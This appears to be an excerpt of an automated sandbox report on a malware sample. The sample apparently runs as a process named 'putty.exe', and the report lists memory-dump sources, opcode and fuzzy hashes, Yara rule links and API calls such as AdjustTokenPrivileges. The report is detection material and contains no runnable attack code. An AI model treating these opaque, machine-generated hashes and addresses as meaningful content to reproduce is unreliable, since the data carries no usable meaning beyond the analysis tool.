                                  0x0010bbea
                                  0x0010bbec
                                  0x0010bbee
                                  0x0010bbee
                                  0x0010bbf0
                                  0x0010bbf0
                                  0x0010bbf2
                                  0x0010bbf4
                                  0x0010bbf6
                                  0x0010bbf6
                                  0x0010bbfa
                                  0x0010bbfa
                                  0x0010bbfc
                                  0x0010bbfd
                                  0x0010bbff
                                  0x0010bc01
                                  0x0010bc04
                                  0x0010bc06
                                  0x0010bc06
                                  0x00000000
                                  0x0010bc06
                                  0x0010bc2d
                                  0x0010bc2f
                                  0x0010bc2f
                                  0x0010bc31
                                  0x00000000
                                  0x00000000
                                  0x0010bc33
                                  0x0010bc35
                                  0x0010bc37
                                  0x0010bc37
                                  0x0010bc39
                                  0x00000000
                                  0x00000000
                                  0x0010bc3b
                                  0x0010bc3d
                                  0x0010bc3f
                                  0x0010bc41
                                  0x0010bc43
                                  0x0010bc44
                                  0x0010bc46
                                  0x0010bc48
                                  0x0010bc48
                                  0x0010bc4a
                                  0x00000000
                                  0x00000000
                                  0x0010bc4c
                                  0x0010bc4e
                                  0x0010bc50
                                  0x0010bc56
                                  0x0010bc58
                                  0x0010bc5b
                                  0x0010bc5d
                                  0x0010bc5f
                                  0x0010bc5f
                                  0x0010bc61
                                  0x0010bc63
                                  0x0010bc63
                                  0x0010bc63
                                  0x0010bc65
                                  0x0010bc67
                                  0x0010bc69
                                  0x0010bc6b
                                  0x0010bc6d
                                  0x0010bc6f
                                  0x0010bc72
                                  0x0010bc74
                                  0x0010bc75
                                  0x0010bc77
                                  0x0010bc79
                                  0x0010bc7c
                                  0x0010bc7e
                                  0x0010bc80
                                  0x0010bc80
                                  0x0010bc82
                                  0x0010bc83
                                  0x0010bc83
                                  0x0010bc85
                                  0x0010bc87
                                  0x0010bc89
                                  0x0010bc8b
                                  0x0010bc8d
                                  0x0010bc8f
                                  0x0010bc91
                                  0x0010bc94
                                  0x0010bc96
                                  0x0010bc98
                                  0x0010bc9a
                                  0x0010bc9b
                                  0x0010bc9d
                                  0x0010bc9f
                                  0x0010bca1
                                  0x0010bca1
                                  0x0010bca3
                                  0x00000000
                                  0x00000000
                                  0x0010bca5
                                  0x0010bca7
                                  0x0010bca9
                                  0x0010bcaf
                                  0x0010bcb1
                                  0x0010bcb3
                                  0x0010bcb5
                                  0x0010bcb7
                                  0x0010bcba
                                  0x0010bcbc
                                  0x0010bcbe
                                  0x0010bcc0
                                  0x0010bcc0
                                  0x0010bcc2
                                  0x0010bcc3
                                  0x0010bcc3
                                  0x0010bcc3
                                  0x0010bcc4
                                  0x0010bcc6
                                  0x0010bcc8
                                  0x0010bcca
                                  0x0010bccb
                                  0x0010bccd
                                  0x0010bccf
                                  0x0010bcd1
                                  0x0010bcd3
                                  0x0010bcd5
                                  0x0010bcd7
                                  0x0010bcd9
                                  0x0010bcdb
                                  0x0010bcdd
                                  0x0010bcdf
                                  0x0010bce1
                                  0x0010bce3
                                  0x0010bce3
                                  0x0010bce4
                                  0x0010bce4
                                  0x0010bce6
                                  0x0010bce8
                                  0x0010bcea
                                  0x0010bcec
                                  0x0010bced
                                  0x0010bcf0
                                  0x0010bcf3
                                  0x0010bcf5
                                  0x0010bcf7
                                  0x0010bcf9
                                  0x0010bcfa
                                  0x0010bcfc
                                  0x0010bcfe
                                  0x0010bd00
                                  0x0010bd00
                                  0x0010bd02
                                  0x00000000
                                  0x00000000
                                  0x0010bd04
                                  0x0010bd06
                                  0x0010bd08
                                  0x0010bd0e
                                  0x0010bd10
                                  0x0010bd12
                                  0x0010bd14
                                  0x0010bd16
                                  0x0010bd1a
                                  0x0010bd1c
                                  0x0010bd1e
                                  0x0010bd20
                                  0x0010bd20
                                  0x0010bd22
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0010bd24
                                  0x0010bd24
                                  0x0010bd24
                                  0x0010bd26
                                  0x0010bd28
                                  0x0010bd2a
                                  0x0010bd2b
                                  0x0010bd2d
                                  0x0010bd2f
                                  0x0010bd31
                                  0x0010bd33
                                  0x0010bd35
                                  0x0010bd37
                                  0x0010bd39
                                  0x0010bd3b
                                  0x0010bd3d
                                  0x0010bd3f
                                  0x0010bd44
                                  0x0010bd44
                                  0x0010bd45
                                  0x0010bd45
                                  0x0010bd45
                                  0x0010bd47
                                  0x0010bd48
                                  0x0010bd4a
                                  0x0010bd4c
                                  0x0010bd4d
                                  0x0010bd52
                                  0x0010bd55
                                  0x0010bd57
                                  0x0010bd59
                                  0x0010bd5a
                                  0x0010bd5c
                                  0x0010bd5e
                                  0x0010bd60
                                  0x0010bd60
                                  0x0010bd62
                                  0x00000000
                                  0x00000000
                                  0x0010bd64
                                  0x0010bd66
                                  0x0010bd68
                                  0x0010bd68
                                  0x0010bd68
                                  0x0010bd6b
                                  0x0010bd6b
                                  0x0010bd6d
                                  0x0010bd6f
                                  0x0010bd71
                                  0x0010bd73
                                  0x0010bd75
                                  0x0010bd77
                                  0x0010bd7a
                                  0x0010bd7c
                                  0x0010bd7e
                                  0x0010bd80
                                  0x0010bd80
                                  0x0010bd82
                                  0x00000000
                                  0x00000000
                                  0x0010bd84
                                  0x0010bd86
                                  0x0010bd88
                                  0x0010bd8a
                                  0x0010bd8b
                                  0x0010bd8d
                                  0x0010bd8f
                                  0x0010bd92
                                  0x0010bd94
                                  0x0010bd96
                                  0x0010bd98
                                  0x0010bd9a
                                  0x0010bd9e
                                  0x0010bda0
                                  0x0010bda2
                                  0x0010bda4
                                  0x0010bda4
                                  0x0010bda6
                                  0x00000000
                                  0x00000000
                                  0x0010bda8
                                  0x0010bdaa
                                  0x0010bdac
                                  0x0010bdac
                                  0x0010bdad
                                  0x0010bdaf
                                  0x0010bdb1
                                  0x0010bdb3
                                  0x0010bdb6
                                  0x0010bdb8
                                  0x0010bdb9
                                  0x0010bdbb
                                  0x0010bdbd
                                  0x0010bdc0
                                  0x0010bdc2
                                  0x0010bdc4
                                  0x0010bdc6
                                  0x0010bdca
                                  0x0010bdcc
                                  0x0010bdcc
                                  0x0010bdcc
                                  0x0010bdce
                                  0x0010bdd0
                                  0x0010bdd2
                                  0x0010bdd5
                                  0x0010bdd7
                                  0x0010bdd7
                                  0x0010bdd7
                                  0x0010bddd
                                  0x00000000
                                  0x0010bddd
                                  0x0010bd6b
                                  0x0010bd45
                                  0x0010bd24
                                  0x0010bce4
                                  0x0010bcc3
                                  0x0010bc83
                                  0x0010bc63
                                  0x00000000
                                  0x0010bc08
                                  0x0010bbf8
                                  0x0010bbf0
                                  0x0010bbea
                                  0x0010bbd9
                                  0x0010bba0
                                  0x0010bb77
                                  0x0010bb57
                                  0x0010bb2a
                                  0x0010b94e
                                  0x00000000
                                  0x0010b944
                                  0x00000000
                                  0x0010b901
                                  0x0010b8f8
                                  0x0010b8a5
                                  0x0010b8a5
                                  0x0010b8a7
                                  0x0010b8a7
                                  0x0010b8aa
                                  0x00000000
                                  0x00000000
                                  0x0010b864
                                  0x0010b868
                                  0x0010b86a
                                  0x0010b86c
                                  0x0010b86f
                                  0x0010b871
                                  0x0010b879
                                  0x0010b87b
                                  0x0010b87d
                                  0x0010b87f
                                  0x0010b881
                                  0x0010b883
                                  0x0010b888
                                  0x0010b88f
                                  0x0010b891
                                  0x0010b894
                                  0x0010b898
                                  0x0010b89a
                                  0x0010b89c
                                  0x0010b89f
                                  0x0010b8a3
                                  0x0010b8ac
                                  0x0010b8b0
                                  0x00000000

                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2115431993.0000000000102000.00000020.00020000.sdmp, Offset: 00100000, based on PE: true
                                  • Associated: 0000000A.00000002.2115416293.0000000000100000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000A.00000002.2115661861.00000000001B4000.00000002.00020000.sdmp Download File
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 84186dff026b49573ac902ff6f1b81ceec98e4f4be35ee285caa7d7f1d34cb6a
                                  • Instruction ID: 719d009c867dc80f7c7f3326ba945c3ef279f92fc90ec4cf3558dc6842b992ab
                                  • Opcode Fuzzy Hash: 84186dff026b49573ac902ff6f1b81ceec98e4f4be35ee285caa7d7f1d34cb6a
                                  • Instruction Fuzzy Hash: F142F76640E3C19FDB138B749CB56D1BFB1AE67218B1E48CBC0C1CF4A7E259594AC722
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 002ADF60, Relevance: .3, Instructions: 265COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116413748.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 27de60511b0123d4c10b53de14c44b323cc8b08df4fc9a00de1bdd2a66473f69
                                  • Instruction ID: fa073f9d648573e68331c271078afcea43c729bcb547aadbd0afa52e222c7dbe
                                  • Opcode Fuzzy Hash: 27de60511b0123d4c10b53de14c44b323cc8b08df4fc9a00de1bdd2a66473f69
                                  • Instruction Fuzzy Hash: F2C12674D14219DFCB10DFA5C5805ADFBB6BF89304F2481A9D859AB74ACB309E42DF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 002ABF30, Relevance: .2, Instructions: 191COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116413748.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7001e38fbd97cf05407a5e4d23c6c18b93ab326969742ca81da0c203da30f17d
                                  • Instruction ID: b7de0982fe6a56fb660b20c3fa968bfb21d52d360f7266bcfb8b683387109986
                                  • Opcode Fuzzy Hash: 7001e38fbd97cf05407a5e4d23c6c18b93ab326969742ca81da0c203da30f17d
                                  • Instruction Fuzzy Hash: BE911570E10219DFDB04DFA5C981A9EFBB2FF89300F20C16AD419AB256DB359A51DF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 005A0006, Relevance: .2, Instructions: 183COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116924683.00000000005A0000.00000040.00000001.sdmp, Offset: 005A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ee861b3b4bf677343e6e53227b297147215c2e200787a01923c9b28f8104886b
                                  • Instruction ID: 29457b500a2d566c779140a6ccc03fd159ae70274f73d0b1b168c2c1fc19bf18
                                  • Opcode Fuzzy Hash: ee861b3b4bf677343e6e53227b297147215c2e200787a01923c9b28f8104886b
                                  • Instruction Fuzzy Hash: D4717B70D0979A8FCB25CF65885079DBBB2BF9A300F1586EAC008A7662E7344A85CF55
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 002A95B1, Relevance: .2, Instructions: 170COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116413748.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 071e843fab107105017f67a8bf7c9df426d7d2795fe3e8454278a8f4a7d0f582
                                  • Instruction ID: ed28c7f463dd962b29c864260b4096e329304faef6929adade28e4744c5ba1dc
                                  • Opcode Fuzzy Hash: 071e843fab107105017f67a8bf7c9df426d7d2795fe3e8454278a8f4a7d0f582
                                  • Instruction Fuzzy Hash: 3071EE74D25209EFCB00CFAAD585A9DBBF1FF4A310F64D4AAE415AB250D734AA91CF10
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 002A5A88, Relevance: .2, Instructions: 167COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116413748.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1089da5b64a7e9e393f5677f7e0dea7300c285664bbe26d83f444829fbf748e4
                                  • Instruction ID: 1c710c757c0122f15b4ee630df713adf18d0bfc9600fb81796e359d8ba0591a5
                                  • Opcode Fuzzy Hash: 1089da5b64a7e9e393f5677f7e0dea7300c285664bbe26d83f444829fbf748e4
                                  • Instruction Fuzzy Hash: 5E611271E00A198BDF04DFAAC8805EEFBB2BF99325F24C529E514BB254DB319901CF61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 005A0070, Relevance: .1, Instructions: 145COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116924683.00000000005A0000.00000040.00000001.sdmp, Offset: 005A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 59dc71e676f25fbe59e41a37688c06bffa2f4f66fd09df499b62144e5d88411f
                                  • Instruction ID: 888ca66b7b5e22a2027dd870abf1e2697bb7116a5935a4b8e0e353a6f40216bd
                                  • Opcode Fuzzy Hash: 59dc71e676f25fbe59e41a37688c06bffa2f4f66fd09df499b62144e5d88411f
                                  • Instruction Fuzzy Hash: DA513A71D1562ACBDB28CF66C9447EDBBB2FF9A300F1096EAC419A6211E7305A81DF44
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 002AA288, Relevance: .1, Instructions: 139COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116413748.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: dc9eca00e50f773017b19d06c3420276a7045771bf2c90fe3d5baf45eeb9d11e
                                  • Instruction ID: cb1a4a97d624245925707dd7ae1a32f632a5ab2c2c89a0d68af1c4514784405c
                                  • Opcode Fuzzy Hash: dc9eca00e50f773017b19d06c3420276a7045771bf2c90fe3d5baf45eeb9d11e
                                  • Instruction Fuzzy Hash: E6512A70D29249DFCF00CFA4C5816AEBBF1BF4A300F24959AD455B7201DB789A60DBA6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 002AA7A0, Relevance: .1, Instructions: 139COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116413748.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d66addb2e4d6ba2a1ddc5d711cb9954dd35f1017e029901dc33b1174652c7e35
                                  • Instruction ID: 1ae11e087e206bfe9319150606cbfca7f4b78b5b0dc97b44de47670806507308
                                  • Opcode Fuzzy Hash: d66addb2e4d6ba2a1ddc5d711cb9954dd35f1017e029901dc33b1174652c7e35
                                  • Instruction Fuzzy Hash: 9F51E274D2520A9FDF04CFAAC9809AEFBF2BF89300F20916AD415B7214D7349A51CF55
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 002A5A78, Relevance: .1, Instructions: 125COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116413748.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9911952ae06e6a2aeabcd4c3ad80318c6221e88aa6a2633348fd68b004789249
                                  • Instruction ID: 31be35c7d4c299a6b7802e3409c3167f03a526170523559653adae2416ecaf2c
                                  • Opcode Fuzzy Hash: 9911952ae06e6a2aeabcd4c3ad80318c6221e88aa6a2633348fd68b004789249
                                  • Instruction Fuzzy Hash: A1510671E006198BDB08DFAAC8405EEFBF2BF99321F24C22AD514BB255EB305911CF61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 002AC500, Relevance: .1, Instructions: 111COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116413748.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 318a9fb0a369995b15a5b28d54ffc63049497811202c0ac0f141d2a3b38c922b
                                  • Instruction ID: 76b08c24fca6f29a8721c572edb89ce117297899761bf324f645543c95d99499
                                  • Opcode Fuzzy Hash: 318a9fb0a369995b15a5b28d54ffc63049497811202c0ac0f141d2a3b38c922b
                                  • Instruction Fuzzy Hash: 654124B0D15209CFDB14CFAAC945AAEFBB6BF8A300F208169D419BB255DB349A519F40
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 002AA5C0, Relevance: .1, Instructions: 92COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116413748.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b1a1dca7bdd7446240259bf3f4a6e60104659afb7fb30b7d304b1322abce5939
                                  • Instruction ID: f80e2bb99b0ee239b8ea099128187be44bc51bd01af84ca71ad5ec8b50cafdd6
                                  • Opcode Fuzzy Hash: b1a1dca7bdd7446240259bf3f4a6e60104659afb7fb30b7d304b1322abce5939
                                  • Instruction Fuzzy Hash: F5413370C2420ADBCF04CF96C4825AEFBF5BF89700F28C46AC425AB244DB74A691DF95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 002AD920, Relevance: .1, Instructions: 85COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116413748.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1d3be10c0fb2986097bcb0dff3b277a4c12d9766acaf88792a95a86c3eb65ed5
                                  • Instruction ID: 6e140ef4d77c196914a093f5a417e246a879fa9ce23129c2f8478b87c22c7116
                                  • Opcode Fuzzy Hash: 1d3be10c0fb2986097bcb0dff3b277a4c12d9766acaf88792a95a86c3eb65ed5
                                  • Instruction Fuzzy Hash: 2B31E874D14219DFDB14CFAAC94569EFBF2BF89300F20C56AC41AAB215DB349A52DF40
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 002AA9C0, Relevance: .1, Instructions: 85COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116413748.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 838ef22c3db3a7f7ea1f26000c37b80955998c31ba4d1d0af9584d4d899c92bd
                                  • Instruction ID: 64e7a06feb8411a8425cbd10aa5ba837a7cda6c0feecd74f6a59757e758641c6
                                  • Opcode Fuzzy Hash: 838ef22c3db3a7f7ea1f26000c37b80955998c31ba4d1d0af9584d4d899c92bd
                                  • Instruction Fuzzy Hash: D93136B1D1420ADBCB08CFA9C6815AEFBF2BF89300F20C0A9C415A7215DB709A51CF96
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 005A1678, Relevance: .1, Instructions: 61COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116924683.00000000005A0000.00000040.00000001.sdmp, Offset: 005A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 42be681a16b587fa994e3f8c26ba571277ad298f04d50807951e5a487ecb873e
                                  • Instruction ID: 7e4daf69ca527f274e5043dced089cf3d369b9ea2f4b1c7eee04cabf92a7bccb
                                  • Opcode Fuzzy Hash: 42be681a16b587fa994e3f8c26ba571277ad298f04d50807951e5a487ecb873e
                                  • Instruction Fuzzy Hash: 3811F670C152699ECB10CFB5D848BEEBEF4BF0A300F14646AE445B3291D7349A44CFA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 005A1740, Relevance: .1, Instructions: 57COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116924683.00000000005A0000.00000040.00000001.sdmp, Offset: 005A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ad62624ce7bd64a0f7ca85bf8a23fffcdbf0fbc20902dd6a3f926668792c1b82
                                  • Instruction ID: 8180c535612f98ae830166337ec9ddc13e08892b703d11516e4003750a5f6e0c
                                  • Opcode Fuzzy Hash: ad62624ce7bd64a0f7ca85bf8a23fffcdbf0fbc20902dd6a3f926668792c1b82
                                  • Instruction Fuzzy Hash: B1110470D052599EDB14CFB9D888BFEBEF0BB0A340F14A46AE445B3281D7745A84CB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 005A1818, Relevance: .1, Instructions: 55COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116924683.00000000005A0000.00000040.00000001.sdmp, Offset: 005A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fc87f50f3e754f668509317ec04176fd52b50cdf930625b6fcbfbc45440f0b4a
                                  • Instruction ID: 70c053dbe624a92366297061869a86f3d7c91583c6a83784a2984eb586a5146d
                                  • Opcode Fuzzy Hash: fc87f50f3e754f668509317ec04176fd52b50cdf930625b6fcbfbc45440f0b4a
                                  • Instruction Fuzzy Hash: 1D11F870D052199EDB14CFAAD848BEEBEF5BF4A300F14946AE455B3290D7388A44DF68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 005A1750, Relevance: .1, Instructions: 55COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116924683.00000000005A0000.00000040.00000001.sdmp, Offset: 005A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 93c9e30b476e5e5b1e6a081001210838c913bccc9b674e2308179843e97fc49a
                                  • Instruction ID: 705f1ae2e6dd32515755f786910f55283b3ae7a40478c4fe7bb048c2748f0b2a
                                  • Opcode Fuzzy Hash: 93c9e30b476e5e5b1e6a081001210838c913bccc9b674e2308179843e97fc49a
                                  • Instruction Fuzzy Hash: 3411F870D042199ECB14CFA9D848BFEBEF1BB4A340F14A46AD445B3281D7745A84CF68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 005A1688, Relevance: .1, Instructions: 55COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116924683.00000000005A0000.00000040.00000001.sdmp, Offset: 005A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a7cdd443694579744aee2b2abdcea6ec44466ce816959a50ec8881d78fa0d2a0
                                  • Instruction ID: 17a48eb9904bce152f631033b931d0403b5cdcf4e676784f932a28a1622ade75
                                  • Opcode Fuzzy Hash: a7cdd443694579744aee2b2abdcea6ec44466ce816959a50ec8881d78fa0d2a0
                                  • Instruction Fuzzy Hash: 9F11E370D052199ECB14CFAAD948BEEBEF4BF4A300F14946AE445F3291D7348A44CF68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Analysis Process: putty.exe PID: 2948 Parent PID: 3056 putty.exeCOMMON

                                  Executed Functions

                                  Function 00530A50, Relevance: 3.1, Strings: 1, Instructions: 1881COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117994460.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: 4v(
                                  • API String ID: 0-2431902420
                                  • Opcode ID: 1adc2393fc9cd34d44a2d25033fe55a823e505edcece28702f0d07e91e2ad525
                                  • Instruction ID: c80068969c0e109818434f1da381fce9e27d61f8f1c9573e5ff96f0678dc6b3c
                                  • Opcode Fuzzy Hash: 1adc2393fc9cd34d44a2d25033fe55a823e505edcece28702f0d07e91e2ad525
                                  • Instruction Fuzzy Hash: D713D674A11618CFC765DF34C894BA9B7B6FF8A300F1092EAE5096B260DB316E85CF45
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0057086B, Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                  Download Yara Rule
                                  APIs
                                  • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 005708EB
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2118097018.0000000000570000.00000040.00000001.sdmp, Offset: 00570000, based on PE: false
                                  Similarity
                                  • API ID: AdjustPrivilegesToken
                                  • String ID:
                                  • API String ID: 2874748243-0
                                  • Opcode ID: eb15f15a94c90d627bdebccee28a4ad7fa31475997d7c397690ce75d05aabec2
                                  • Instruction ID: b9cc8e46c5a2ab2f2105f381b6ba33ba86e945fa1421d7e7926cf88ebe5c06d6
                                  • Opcode Fuzzy Hash: eb15f15a94c90d627bdebccee28a4ad7fa31475997d7c397690ce75d05aabec2
                                  • Instruction Fuzzy Hash: 272191765097809FEB128F25DC44B52BFF4EF16310F0885DAE9898B5A3D2719908DB62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 005708A2, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                  Download Yara Rule
                                  APIs
                                  • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 005708EB
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2118097018.0000000000570000.00000040.00000001.sdmp, Offset: 00570000, based on PE: false
                                  Similarity
                                  • API ID: AdjustPrivilegesToken
                                  • String ID:
                                  • API String ID: 2874748243-0
                                  • Opcode ID: b1469e19e4780aaa8d4064efaffb59cdb366b12e0450c4f84e500de141281459
                                  • Instruction ID: 5d42a8016e5bff5ef899300120bf765808ac27dd9f663acb27e01a5df11c85e7
                                  • Opcode Fuzzy Hash: b1469e19e4780aaa8d4064efaffb59cdb366b12e0450c4f84e500de141281459
                                  • Instruction Fuzzy Hash: 77114C76500744DFEB20CF55E884B66FBE4FF04320F08D5AAEE498B652D271E414EB61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0053F450, Relevance: 1.5, Strings: 1, Instructions: 221COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117994460.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: b.
                                  • API String ID: 0-890368386
                                  • Opcode ID: 0392bf0851681419e1402906c61b3cbed845935312b4692617158726be0874d6
                                  • Instruction ID: e04319675709b21fba7f62fbae4a9831cef12ecec80c134c67185e63da8ca2b6
                                  • Opcode Fuzzy Hash: 0392bf0851681419e1402906c61b3cbed845935312b4692617158726be0874d6
                                  • Instruction Fuzzy Hash: E59117B0D0521AEFCF04DFE5D5815AEBFB1FB89300F20A92AD506BB354D7349A429B94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 005331F8, Relevance: 1.3, Instructions: 1268COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117994460.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 48d02fb3ad154513670825c2f4470b313315ac48dca75c7a55990702d12509a5
                                  • Instruction ID: 27acbe9a11df516db81201423ff6f212b0d1754e573ca0af0f632035341338bd
                                  • Opcode Fuzzy Hash: 48d02fb3ad154513670825c2f4470b313315ac48dca75c7a55990702d12509a5
                                  • Instruction Fuzzy Hash: 3DD2C634A11618CFC765DB24C898BEDB7B1FF8A305F6052E9E4096B2A0DB716E85CF41
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00538938, Relevance: .3, Instructions: 259COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117994460.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b2a4c574c02b587ba3eeb1671c65ab846abcb11373fd190e11dbf8943d602483
                                  • Instruction ID: 244f01e5843e6d951728af4222b7bc6d6901f3a82a2e06509d7a7e243c11ed97
                                  • Opcode Fuzzy Hash: b2a4c574c02b587ba3eeb1671c65ab846abcb11373fd190e11dbf8943d602483
                                  • Instruction Fuzzy Hash: C9C15C7490620ADFCB08CFA4D5849BEFBB1FF48310F24A955D416BB215CB34AA81DFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0053CD28, Relevance: .2, Instructions: 214COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117994460.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c52e27c2b3f475421c711f8c6223dc71a187b080fb60451ad42757f1fa5aeb77
                                  • Instruction ID: b0fc8cdefcf80a57877c1c4086cbec590515b284b88cc3e8949f3dc7a89416b4
                                  • Opcode Fuzzy Hash: c52e27c2b3f475421c711f8c6223dc71a187b080fb60451ad42757f1fa5aeb77
                                  • Instruction Fuzzy Hash: 21910FB0D052099FCB04DFAAD5809AEBFF2BF89310F24C92AE415BB254D7349A41DF95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0053CD18, Relevance: .2, Instructions: 213COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117994460.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
